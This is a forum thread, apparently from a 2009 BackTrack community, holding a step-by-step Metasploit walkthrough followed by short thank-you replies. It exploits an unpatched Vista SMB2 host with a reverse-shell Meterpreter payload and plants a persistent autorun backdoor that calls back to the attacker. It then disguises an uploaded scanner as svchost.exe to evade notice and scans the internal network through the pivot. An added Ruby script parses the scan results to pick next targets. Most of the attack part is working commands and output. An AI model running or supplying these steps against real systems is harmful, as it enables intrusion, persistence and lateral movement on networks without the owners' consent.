
Thread: Meta "Pivot" Scanning - and other useful junk

  1. #1 imported_vvpalin (Member; Join Date: Apr 2009; Posts: 442)

    Meta "Pivot" Scanning - and other useful junk

    I apologize if this is written some other place, but I found it rather useful. I took the last few months off to do some really heavy learning and it's been a long time since I wrote a guide, so honestly I'm just trying to get my hands dirty before I start writing some more in-depth stuff.
    A word to the wise: while there is a way to scan directly through a pivot and it has its advantages, let me tell you something from experience, not only is it slow, but it's also highly unreliable. More than a few times it has crashed my session or failed to pick up known open ports.

    All that being said, let's get started.

    First you need to go here and download the .zip
    Downloads - pivot-scan - Project Hosting on Google Code

    Now for the install

    unzip pivotscan_rb.zip
    sed -i 's/(Yes)/(,)/' pivot-scan.rb
    sed -i 's/sl -q 1000 -s -c 3/sl -q 1000 -s -c 1000/' pivot-scan.rb
    mv pivot-scan.rb /pentest/exploits/framework3/scripts/meterpreter/
    ### The above sed commands are fairly important, otherwise you won't be seeing everything you should.

    Let's load up msfconsole and find ourselves a vulnerable host.

    I managed to find myself a nice and juicy unpatched Vista SMB2 exploit to use on 192.168.10.104, so ...

    msf > use scanner/smb/smb2

    msf auxiliary(smb2) > set rhosts 192.168.10.104
    rhosts => 192.168.10.104

    msf auxiliary(smb2) > run
    [*] 192.168.10.104 supports SMB 2 [dialect 2.2] and has been online for 87 hours
    [*] Auxiliary module execution completed
    msf auxiliary(smb2) >
    Now let's cross our fingers.

    msf > use windows/smb/smb2_negotiate_func_index

    msf > set rhost 192.168.10.104
    rhost => 192.168.10.104

    msf > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp

    msf > set lhost 192.168.10.126
    lhost => 192.168.10.126

    msf > set lport 445
    lport => 445

    msf > set ExitOnSession false
    ExitOnSession => false

    msf > exploit -j
    [*] Started reverse handler
    [*] Connecting to the target (192.168.10.104:445)
    [*] Sending the exploit packet (872 bytes)
    [*] Waiting up to 180 seconds for exploit to trigger
    [*] Sending stage (719360 bytes)
    [*] Meterpreter session 1 opened (192.168.10.126:445 -> 192.168.10.104:49208)

    msf > sessions -v
    Active sessions
    ===============
    Id Description Tunnel Via
    -- ----------- ------ ---
    1 Meterpreter 192.168.10.126:445 -> 192.168.10.104:49208 windows/smb/smb2_negotiate_func_index

    msf >
    Sweet!! Now we have our nicely exploited PC, so let's do a little maintenance, then move on to the scanning.

    msf > sessions -i 1
    [*] Starting interaction with 1

    meterpreter > sysinfo
    Computer: WIN-BPTA72KBDYU
    OS : Windows Vista (Build 6001, Service Pack 1).
    Arch : x86
    Language: en_US

    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM

    meterpreter > run persistence -X -i 60 -r 192.168.10.126 -p 8080
    [*] Creating a persistent agent: LHOST=192.168.10.126 LPORT=8080 (interval=60 onboot=true)
    [*] Persistent agent script is 47309 bytes long
    [*] Uploaded the persistent agent to C:\Windows\TEMP\oFVccxSg.vbs
    [*] Agent executed with PID 3904
    [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run \UrKohmHN
    [*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run \UrKohmHN

    meterpreter >
    Now that we have a persistent backdoor in case something fails, let's start our scanning.


    meterpreter > run pivot-scan.rb -a
    [*] Created by Augusto Pereyra aepereyra at gmail.com
    [*] Uploading Portscanner
    [*] Performing portscanning for IP range 192.168.10.1-192.168.10.254

    -------------------------------------
    192.168.10.104,"",0,0,"Yes","135 139 445 3389","123 137 138 500 1900"
    -------------------------------------
    192.168.10.142,"",0,0,"No","21 22 25 79 80 88 110 135 139 445 1025 1433 3389",""
    -------------------------------------
    meterpreter >
    There are a few other ways we can do this too; the first, simple way is like so.

    meterpreter > upload /pentest/windows-binaries/scanners/sl.exe c:\\windows\\system32\\
    [*] uploading : /pentest/windows-binaries/scanners/sl.exe -> c:\windows\system32\
    [*] uploaded : /pentest/windows-binaries/scanners/sl.exe -> c:\windows\system32\\sl.exe


    meterpreter > execute -f cmd.exe -c -H -t
    Process 3804 created.
    Channel 3 created.

    meterpreter > interact 3
    Interacting with channel 3...

    Microsoft Windows [Version 6.0.6001]
    Copyright (c) 2006 Microsoft Corporation. All rights reserved.

    C:\Windows\system32> sl -s 192.168.10.1-254
    sl -s 192.168.10.1-254
    Scan of 254 IPs started at Sun Oct 25 22:49:11 2009
    192.168.10.104,"",0,0,"Yes","135 139 445 3389","123 137 138 500 1900"
    192.168.10.142,"",0,0,"No","21 22 25 79 80 88 110 135 139 445 1025 1433 3389",""
    -------------------------------------------------------------------------------
    C:\Windows\system32> exit
    meterpreter >
    OK, so on to the last method. First we need to make just a small change; it isn't necessary, but I'll explain.

    cd /pentest/exploits/framework3/scripts/meterpreter/
    sed -i 's/svhost#{rand(100)}/svchost/' uploadexec.rb
    sed -i 's/prin_status/print_status/' uploadexec.rb
    sed -i 's/TEMP/WINDIR/g' uploadexec.rb
    OK, the first command changes what you upload from something like svhost11.exe to svchost.exe. Why, you ask? Well, two reasons: one, it's less obvious, but the more important one is that you cannot kill anything named svchost.exe; just try renaming calc.exe and find out. The second is to fix a bug which hopefully will be updated within the next day or so, and the last command just changes our default dir to the default C:\Windows.

    meterpreter > run uploadexec -e /pentest/windows-binaries/scanners/sl.exe -o "-s 192.168.10.1-254" -v -r
    [*] Running Upload and Execute Meterpreter script....
    [*] Uploading /pentest/windows-binaries/scanners/sl.exe....
    [*] /pentest/windows-binaries/scanners/sl.exe uploaded!
    [*] Uploaded as C:\Windows\svchost.exe
    [*] Running command C:\Windows\svchost.exe

    192.168.10.104,"",0,0,"Yes","135 139 445 3389","123 137 138 500 1900"
    192.168.10.142,"",0,0,"No","21 22 25 79 80 88 110 135 139 445 1025 1433 3389",""
    [*] Deleting C:\Windows\svchost.exe
    [*] Finnished!
    meterpreter >
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.
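All three methods in the post end with the same thing: ScanLine's CSV records scrolling past in the meterpreter session. As an added example, not code from the post or from the pivot-scan project, here is a small Ruby script (the language Meterpreter scripts such as pivot-scan.rb and uploadexec.rb are written in) that parses those records so the result can be acted on rather than eyeballed: which hosts expose a given TCP port, and which hosts only showed up because ping-silent hosts were kept (the reason for the first sed edit above). The column layout is assumed from the records shown in the post; the two numeric fields after the hostname are ignored, and the sample records are constructed from the post's output.

```ruby
# Parse ScanLine (sl.exe) CSV output as it comes back through a pivot.
# Added example, not code from the post or from pivot-scan. Column layout is
# an assumption based on the records shown in the post: ip, hostname, two
# numeric fields (ignored here), "Yes"/"No" for whether the host answered
# ping, open TCP ports, open UDP ports.
ScanResult = Struct.new(:ip, :hostname, :pingable, :tcp_ports, :udp_ports)

# Returns a ScanResult for a data record, nil for banners and separators.
def parse_sl_line(line)
  line = line.strip
  return nil if line.empty? || line.start_with?('-') || line.start_with?('Scan of')
  # Fields never contain commas in this format, so a plain split is enough;
  # the -1 keeps the trailing empty UDP field.
  fields = line.split(',', -1).map { |f| f.strip.delete_prefix('"').delete_suffix('"') }
  return nil if fields.size < 7
  ip, host, _f3, _f4, ping, tcp, udp = fields
  ScanResult.new(ip, host, ping == 'Yes', tcp.split.map(&:to_i), udp.split.map(&:to_i))
end

def parse_sl_output(text)
  text.each_line.map { |l| parse_sl_line(l) }.compact
end

# IPs exposing a given TCP port (e.g. 445 to pick the next SMB target).
def hosts_with_tcp(results, port)
  results.select { |r| r.tcp_ports.include?(port) }.map(&:ip)
end

# Hosts that did not answer ping but still have open ports: the ones an
# unmodified pivot-scan.rb (the "(Yes)" filter) would have dropped.
def ping_silent_hosts(results)
  results.reject(&:pingable).map(&:ip)
end

# Constructed sample, copied from the records in the post.
SAMPLE = <<~SL
  Scan of 254 IPs started at Sun Oct 25 22:49:11 2009
  192.168.10.104,"",0,0,"Yes","135 139 445 3389","123 137 138 500 1900"
  192.168.10.142,"",0,0,"No","21 22 25 79 80 88 110 135 139 445 1025 1433 3389",""
  -------------------------------------------------------------------------------
SL

if __FILE__ == $PROGRAM_NAME
  results = parse_sl_output(SAMPLE)
  results.each do |r|
    puts format('%-16s ping=%-3s tcp=%s udp=%s', r.ip, r.pingable ? 'yes' : 'no',
                r.tcp_ports.join(','), r.udp_ports.join(','))
  end
  puts "445/tcp open on: #{hosts_with_tcp(results, 445).join(' ')}"
  puts "alive but ping-silent: #{ping_silent_hosts(results).join(' ')}"
end
```

Feed it the text captured from `run pivot-scan.rb`, the `sl -s` channel, or `run uploadexec ... -v`; the separator and "Scan of" lines are skipped, so the output can be pasted in as-is.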

  2. #2 Isohump (Junior Member; Join Date: Sep 2009; Posts: 63)

    Thanks for the info, can't wait to try it.. ^_^

  3. #3 imported_wyze (Jenkem Addict; Join Date: Jul 2007; Posts: 1,543)

    Nicely done
    dd if=/dev/swc666 of=/dev/wyze

  4. #4

    Great post and thanks for sharing. Looking forward to your next posts.
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  5. #5 Miland3r (Junior Member; Join Date: Jan 2010; Location: /dev/random; Posts: 28)

    Hi vvpalin,
    Very neat howto, thanks. Will definitely be looking out for future posts.
